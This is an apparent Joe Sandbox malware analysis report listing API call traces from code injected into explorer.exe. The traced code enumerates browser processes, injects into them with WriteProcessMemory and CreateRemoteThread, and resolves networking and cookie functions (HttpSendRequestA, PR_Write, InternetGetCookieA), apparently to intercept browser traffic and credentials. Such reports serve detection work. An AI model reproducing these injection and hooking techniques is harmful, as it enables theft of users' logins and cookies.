                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyExW.KERNELBASE ref: 00A327C7
                                                                                                                                      • RegQueryValueExW.KERNELBASE ref: 00A327F4
                                                                                                                                      • RegQueryValueExW.KERNELBASE ref: 00A3283A
                                                                                                                                      • RegCloseKey.KERNELBASE ref: 00A32860
                                                                                                                                        • Part of subcall function 00A31860: RtlFreeHeap.NTDLL ref: 00A31880
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: QueryValue$CloseFreeHeapOpen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1641618270-0
                                                                                                                                      • Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                                      • Instruction ID: bd8affd4b7c7af9d1921d9c653868cca57a3d63f55d18cc3b7e60bfe4323775e
                                                                                                                                      • Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                                      • Instruction Fuzzy Hash: 1631853060CB488FE769DF28D45877A7BE0FBA8355F54062EF49AC2265DF34C9468742

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph for a3372c-a337f0: rendered as an image in the original report; basic-block listing omitted. Calls: a31838, RegCreateKeyExW, RegCloseKey, a31860.
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCreate
                                                                                                                                      • String ID: ?
                                                                                                                                      • API String ID: 2932200918-1684325040
                                                                                                                                      • Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                                      • Instruction ID: f67c5445fcc41d395a2a20e81ea845615941d7c52ca5c8851538c3687672b133
                                                                                                                                      • Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                                      • Instruction Fuzzy Hash: D7116370618B488FD751DF69D48866AB7E1FB98345F50062EF48AC3260DF389985CB82

                                                                                                                                      Control-flow Graph
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryA.KERNELBASE ref: 00A3A397
                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00A3A441
                                                                                                                                      • VirtualProtect.KERNELBASE ref: 00A3A45F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A39000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A39000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a39000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 895956442-0
                                                                                                                                      • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                                      • Instruction ID: 240d75ebfc128fdb1176a8cbfbf0802f095b1ab4bfa02c19079121eb298e7540
                                                                                                                                      • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                                      • Instruction Fuzzy Hash: 97514732758D2D4BCB24ABB898C42E5B3D1F779321F18062AE4DAC7294D969D8468383

                                                                                                                                      Control-flow Graph
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00A3298C: GetFileAttributesW.KERNELBASE ref: 00A3299E
                                                                                                                                      • GetPrivateProfileSectionNamesW.KERNEL32 ref: 00A3330F
                                                                                                                                      • GetPrivateProfileStringW.KERNEL32 ref: 00A3336F
                                                                                                                                      • GetPrivateProfileIntW.KERNEL32 ref: 00A3338C
                                                                                                                                        • Part of subcall function 00A330A8: FindFirstFileW.KERNELBASE ref: 00A33104
                                                                                                                                        • Part of subcall function 00A31860: RtlFreeHeap.NTDLL ref: 00A31880
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 970345848-0
                                                                                                                                      • Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                                      • Instruction ID: 7c36409d49f170a1272aa11c73ef9568dfdf0ff21ad2e262286cc48c8fdfe46f
                                                                                                                                      • Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                                      • Instruction Fuzzy Hash: 8E51A53171CF094FEF59BB2CA85667972D2EB98300F44456EF40AC7296EE64DD418386

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • StrStrIW.KERNELBASE ref: 00A3347E
                                                                                                                                      • RegOpenKeyExW.KERNELBASE ref: 00A3353F
                                                                                                                                      • RegEnumKeyExW.KERNELBASE ref: 00A335D6
                                                                                                                                        • Part of subcall function 00A32774: RegOpenKeyExW.KERNELBASE ref: 00A327C7
                                                                                                                                        • Part of subcall function 00A32774: RegQueryValueExW.KERNELBASE ref: 00A327F4
                                                                                                                                        • Part of subcall function 00A32774: RegQueryValueExW.KERNELBASE ref: 00A3283A
                                                                                                                                        • Part of subcall function 00A32774: RegCloseKey.KERNELBASE ref: 00A32860
                                                                                                                                        • Part of subcall function 00A33254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 00A3330F
                                                                                                                                        • Part of subcall function 00A31860: RtlFreeHeap.NTDLL ref: 00A31880
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1841478724-0
                                                                                                                                      • Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                                      • Instruction ID: b18cbd0a43164da40635547118c50aec95e82a36f34817421e85fa1c77c064d9
                                                                                                                                      • Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                                      • Instruction Fuzzy Hash: 96415930718B0C4FDB98EF6D949972AB6E2FB98341F40456EB14EC3261DF34D9448B42

                                                                                                                                      Control-flow Graph
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCreateFileHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3498533004-0
                                                                                                                                      • Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                                      • Instruction ID: 4353f6915e4d835bc35a30c66ebf2fd86edecaf65cf8100883c4b31db03b457a
                                                                                                                                      • Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                                      • Instruction Fuzzy Hash: 3DF09B7021570A4FE7546FB94498336B5E0FB48355F18473DF45AC22D0D73589468742

                                                                                                                                      Control-flow Graph
                                                                                                                                      APIs
                                                                                                                                      • CreateStreamOnHGlobal.COMBASE ref: 00A322D0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateGlobalStream
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2244384528-0
                                                                                                                                      • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                                      • Instruction ID: 983a92297e708e1d22703afbe5c034ebe6615020b2c8f78591cf9577568ad971
                                                                                                                                      • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                                      • Instruction Fuzzy Hash: 55E08C30108B0A8FD758AFBCE4CA17A33A1EB9C252B05053EE005CB114D27988C18741

                                                                                                                                      Control-flow Graph
                                                                                                                                      APIs
                                                                                                                                      • GetFileAttributesW.KERNELBASE ref: 00A3299E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AttributesFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                      • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                                      • Instruction ID: 54e4abde0976d08ac5ad411894da3261982b70f5844a3656cab5c5b2d0b74eab
                                                                                                                                      • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                                      • Instruction Fuzzy Hash: 04D0A732712905077B6427F90CDD37130A0D71932AF140B3AFA36C12E0E295CCD5A301

                                                                                                                                      Control-flow Graph
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                      • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                                      • Instruction ID: 12abc9424407d3b1a49ce848cd2c036b313bd497d4ee040f73c97753a60afa71
                                                                                                                                      • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                                      • Instruction Fuzzy Hash: CBD01224B16A080BEF2CBBFA1D8D174BAD2E758212F188465B819C3251DD39C895C345

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage: 6.8%
                                                                                                                                      Dynamic/Decrypted Code Coverage: 100%
                                                                                                                                      Signature Coverage: 0%
                                                                                                                                      Total number of Nodes: 223
                                                                                                                                      Total number of Limit Nodes: 16
3222d02 1605->1606 1607 3222678 6 API calls 1605->1607 1607->1606

Callgraph

Control-flow Graph
APIs
  • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
  • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
• GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 03223886
• GetCurrentProcessId.KERNEL32(00000001), ref: 0322389B
• wsprintfA.USER32 ref: 032238B6
  • Part of subcall function 0322118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 032211A9
  • Part of subcall function 0322118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 032211C1
  • Part of subcall function 0322118D: lstrlen.KERNEL32(?,00000000), ref: 032211C9
  • Part of subcall function 0322118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 032211D4
  • Part of subcall function 0322118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 032211EE
  • Part of subcall function 0322118D: wsprintfA.USER32 ref: 03221205
  • Part of subcall function 0322118D: CryptDestroyHash.ADVAPI32(?), ref: 0322121E
  • Part of subcall function 0322118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 03221228
• CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 032238CD
• GetLastError.KERNEL32 ref: 032238D3
• RtlInitializeCriticalSection.NTDLL(03226038), ref: 032238F3
• PathFindFileNameA.SHLWAPI(?), ref: 032238FA
• lstrcat.KERNEL32(03225CDE,00000000), ref: 03223910
• Sleep.KERNEL32(000001F4), ref: 0322392A
• lstrcmpiA.KERNEL32(00000000,firefox.exe), ref: 0322393C
• GetCommandLineW.KERNEL32(?), ref: 0322394F
• GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 0322397E
• GetProcAddress.KERNEL32(00000000), ref: 03223987
• GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 032239AF
• GetProcAddress.KERNEL32(00000000), ref: 032239B2
• GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 032239C4
• GetProcAddress.KERNEL32(00000000), ref: 032239C7
• GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 032239E1
• GetProcAddress.KERNEL32(00000000), ref: 032239E4
• GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 032239EC
• GetProcAddress.KERNEL32(00000000), ref: 032239EF
• lstrcmpiA.KERNEL32(00000000,chrome.exe), ref: 03223A6D
• GetCommandLineA.KERNEL32(NetworkService), ref: 03223A78
• StrStrIA.SHLWAPI(00000000), ref: 03223A7B
• lstrcmpiA.KERNEL32(00000000,opera.exe), ref: 03223A8E
• GetCommandLineA.KERNEL32(NetworkService), ref: 03223A9D
• StrStrIA.SHLWAPI(00000000), ref: 03223AA0
• GetModuleHandleA.KERNEL32(opera.dll), ref: 03223ABF
• GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 03223ACC
• CommandLineToArgvW.SHELL32(00000000), ref: 03223956
  • Part of subcall function 032216C7: GetCurrentProcessId.KERNEL32 ref: 032216D9
  • Part of subcall function 032216C7: GetCurrentThreadId.KERNEL32 ref: 032216E1
  • Part of subcall function 032216C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 032216F1
  • Part of subcall function 032216C7: Thread32First.KERNEL32(00000000,0000001C), ref: 032216FF
  • Part of subcall function 032216C7: CloseHandle.KERNEL32(00000000), ref: 03221758
• lstrcmpiA.KERNEL32(00000000,iexplore.exe), ref: 03223A10
• lstrcmpiA.KERNEL32(00000000,microsoftedgecp.exe), ref: 03223A20
• lstrcmpiA.KERNEL32(00000000,msedge.exe), ref: 03223A30
• GetCommandLineA.KERNEL32(NetworkService), ref: 03223A47
• StrStrIA.SHLWAPI(00000000), ref: 03223A4A
• GetModuleHandleA.KERNEL32(chrome.dll), ref: 03223A5F
• GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 03223B2C
• GetProcAddress.KERNEL32(00000000), ref: 03223B35
• GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 03223B52
• GetProcAddress.KERNEL32(00000000), ref: 03223B55
• GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 03223B72
• GetProcAddress.KERNEL32(00000000), ref: 03223B75
• GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 03223B99
• GetProcAddress.KERNEL32(00000000), ref: 03223B9C
• GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 03223BA9
• GetProcAddress.KERNEL32(00000000), ref: 03223BAC
• GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 03223BB9
• GetProcAddress.KERNEL32(00000000), ref: 03223BBC
  • Part of subcall function 03221C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 03221C42
• RtlExitUserThread.NTDLL(00000000), ref: 03223BD9
• wsprintfA.USER32 ref: 03223C1F
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03223C69
• Process32First.KERNEL32(00000000,?), ref: 03223C88
• CloseHandle.KERNELBASE(00000000), ref: 03223D77
• Sleep.KERNELBASE(000003E8), ref: 03223D82
Strings
Memory Dump Source
• Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
Similarity
• API ID: Handle$Module$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvCriticalDataDestroyErrorExitFindInitializeLastMemoryMoveMutexParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
• String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
• API String ID: 2480436012-2618538661
• Opcode ID: 096efdb043fcddc2accb73bda534ddacc2da4712c7f8d231026e6c5444d6c0a8
• Instruction ID: fdd413dde833440d2a516f07a10878a8e3b4e7813686fb19a07749bae345363b
• Opcode Fuzzy Hash: 096efdb043fcddc2accb73bda534ddacc2da4712c7f8d231026e6c5444d6c0a8
• Instruction Fuzzy Hash: E2A1E675A70335BBC620FB73BC0CE2F7E9CAF50A41B054515FA11A7145DBB8DAC18AA1

Control-flow Graph

APIs
  • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
  • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
• wsprintfA.USER32 ref: 03223C1F
  • Part of subcall function 03221235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0322123F
  • Part of subcall function 03221235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,03223C33), ref: 03221251
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03223C69
• Process32First.KERNEL32(00000000,?), ref: 03223C88
• lstrcmpiA.KERNEL32(?,firefox.exe), ref: 03223CA1
• lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 03223CB1
• lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03223CC1
• lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03223D12
• Process32Next.KERNEL32(00000000,00000128), ref: 03223D68
• CloseHandle.KERNELBASE(00000000), ref: 03223D77
• Sleep.KERNELBASE(000003E8), ref: 03223D82
  • Part of subcall function 03221141: lstrlen.KERNEL32(?,?,?,00000000,?,032229DD,00000001), ref: 03221150
  • Part of subcall function 03221141: lstrlen.KERNEL32(:method POST,?,00000000,?,032229DD,00000001), ref: 03221155
Strings
Memory Dump Source
• Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
Similarity
• API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateCloseCreateFirstHandleMappingNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
• String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
• API String ID: 2509890648-2554907557
• Opcode ID: a7204b18c687aad88399b698b212d41ce622c72222bccce2bfa7fc644b7daf91
                                                                                                                                      • Instruction ID: a0d823a881309727e7d418a86311e6904a2cd1c4d494c90ecff2e39bb318ed21
                                                                                                                                      • Opcode Fuzzy Hash: a7204b18c687aad88399b698b212d41ce622c72222bccce2bfa7fc644b7daf91
                                                                                                                                      • Instruction Fuzzy Hash: 4F412839620331BBC634FB75EC48E7E7FADAF94A00F044618B95187184DF68EA8586A1

Control-flow Graph

Basic blocks (node: address range, calls -> successors):
• 159: 3223d8d-3223d97, call 3221274 -> 162, 163
• 162: 3223e03-3223e04
• 163: 3223d99-3223dc2, call 3221000, RtlMoveMemory -> 166, 167
• 166: 3223dc4-3223de2, call 3221000, RtlMoveMemory -> 167
• 167: 3223de8-3223dfc -> 171, 172
• 171: 3223e0a-3223e15, call 3223be1 -> 178, 179
• 172: 3223dfe-3223dff -> 162, 173
• 173: 3223e01-3223e05, call 3223862 -> 171
• 178: 3223e20-3223e23
• 179: 3223e17-3223e1b, call 3223d8d (this function's own entry) -> 178
APIs
  • Part of subcall function 03221274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 03221281
  • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
  • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
• RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 03223DAF
• RtlMoveMemory.NTDLL(00000000,?,?), ref: 03223DE2
• NtUnmapViewOfSection.NTDLL(000000FF), ref: 03223DEB
Strings
Memory Dump Source
• Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
Similarity
• API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
• String ID: 0-Fw
• API String ID: 4050682147-2310602258
• Opcode ID: 39c4b660841dce020d9207b1cc714f9f6248fb3d42e9056219a9e1811dbc8204
• Instruction ID: 77603e4b9091ee2328a15020a148c12c35fdd0e471573a0a565f9f380292d0b8
• Opcode Fuzzy Hash: 39c4b660841dce020d9207b1cc714f9f6248fb3d42e9056219a9e1811dbc8204
• Instruction Fuzzy Hash: 7001DE39424221FBC628FB25EC4CA667F58AF10201B048599A9118B194CBBA96C5DAA0

Control-flow Graph

Basic blocks (node: address range, calls -> successors):
• 184: 3222ea8-3222ebc, StrStrIA -> 185, 186
• 185: 3222ebe-3222eca, call 3222e1b -> 186
• 186: 3222ecd-3222ed1
APIs
• StrStrIA.KERNELBASE(chrome.exe|opera.exe|msedge.exe,?,00000000,?,03223CD2), ref: 03222EB4
  • Part of subcall function 03222E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,03222EC5), ref: 03222E27
  • Part of subcall function 03222E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 03222E52
  • Part of subcall function 03222E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 03222E7F
  • Part of subcall function 03222E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 03222E92
Strings
• chrome.exe|opera.exe|msedge.exe, xrefs: 03222EAB
Memory Dump Source
• Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
Similarity
• API ID: Process$InformationQuery$Open
• String ID: chrome.exe|opera.exe|msedge.exe
• API String ID: 4117927671-3743313796
• Opcode ID: b1e726133f3e0478639d39ee7ec4bb7fbf4edc6fc8946de3c295a6eed577cefc
• Instruction ID: 63723b9be142e37c2b763a82fc0e3583431ddaeb2960d9db49c759ec67bbe84d
• Opcode Fuzzy Hash: b1e726133f3e0478639d39ee7ec4bb7fbf4edc6fc8946de3c295a6eed577cefc
• Instruction Fuzzy Hash: 8AD0A9323203316B576DB97B6C0982FA88DCACA862306453EE802C7200EA819C8342E0

Control-flow Graph

Basic blocks (node: address range, calls -> successors):
• 181: 3221235-3221247, OpenFileMappingA -> 182, 183
• 182: 3221249-3221259, MapViewOfFile -> 183
• 183: 322125c-3221260
APIs
• OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0322123F
• MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,03223C33), ref: 03221251
Memory Dump Source
• Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
Similarity
• API ID: File$MappingOpenView
• String ID:
• API String ID: 3439327939-0
• Opcode ID: 6c224f9030218a0870cdce3f4390a32246accf77c0448ec3cb5cca05b359bfe4
• Instruction ID: d1f2c7673b9d066449d4bce67885f48fe82b57802e5806be68987d0482fdd052
• Opcode Fuzzy Hash: 6c224f9030218a0870cdce3f4390a32246accf77c0448ec3cb5cca05b359bfe4
• Instruction Fuzzy Hash: D2D017327152317BE3386ABB6C0CF83AE9DDF96AE1B058125B509D2140D6608860C2F0

Control-flow Graph

Basic blocks (node: address range, calls):
• 189: 3221261-3221273, UnmapViewOfFile, CloseHandle
APIs
• UnmapViewOfFile.KERNEL32(00000000,00000000,03223C5E,00000001), ref: 03221265
• CloseHandle.KERNELBASE(?), ref: 0322126C
Memory Dump Source
• Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
Similarity
• API ID: CloseFileHandleUnmapView
• String ID:
• API String ID: 2381555830-0
• Opcode ID: ebcd01f59458d0330a9d36323fe6aea853bd76caf82dcc2f0744f33f42cd8739
• Instruction ID: 04ad9f1d053893b6532d00f971fdc157f90fbd8440887cde4bc61d67363cc8d6
• Opcode Fuzzy Hash: ebcd01f59458d0330a9d36323fe6aea853bd76caf82dcc2f0744f33f42cd8739
• Instruction Fuzzy Hash: DFB09236429020E7823837667C0C8CA3A189A69221302D140B00E8200846240A8186A8

Control-flow Graph

Basic blocks (node: address range, calls):
• 190: 3221000-3221010, GetProcessHeap, RtlAllocateHeap
APIs
• GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
• RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
Memory Dump Source
• Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
• Opcode ID: e61b5b419c477000bd00002e0295ee0d2739decc76b8fd9e35ca45f8f1705757
• Instruction ID: 0457890811eb2fcfe37a1a70efa8adc765c17088bb528bbfe2df5b113b70ba69
• Opcode Fuzzy Hash: e61b5b419c477000bd00002e0295ee0d2739decc76b8fd9e35ca45f8f1705757
• Instruction Fuzzy Hash: 84A012B0510100BBDE1837A1BC0DF153518F750301F00D004710681044896001548F20

Control-flow Graph

APIs
  • Part of subcall function 03221274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 03221281
• OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,7556E800), ref: 0322201A
• NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 03222055
• NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 032220E5
• RtlMoveMemory.NTDLL(00000000,032250A0,00000016), ref: 0322210C
• RtlMoveMemory.NTDLL(-00000016,00000363), ref: 03222134
• NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 03222144
• CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 0322215E
• GetLastError.KERNEL32 ref: 03222166
• CloseHandle.KERNEL32(00000000), ref: 03222174
• Sleep.KERNEL32(000003E8), ref: 0322217B
• GetModuleHandleA.KERNEL32(ntdll,atan), ref: 03222191
• GetProcAddress.KERNEL32(00000000), ref: 03222198
• ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 032221AE
• WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 032221D8
• CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 032221EB
• CloseHandle.KERNEL32(00000000), ref: 032221F2
• Sleep.KERNEL32(000001F4), ref: 032221F9
• WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 0322220D
• CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 03222224
• CloseHandle.KERNEL32(00000000), ref: 03222231
• CloseHandle.KERNEL32(?), ref: 03222237
• CloseHandle.KERNEL32(?), ref: 0322223D
• CloseHandle.KERNEL32(00000000), ref: 03222240
Strings
Memory Dump Source
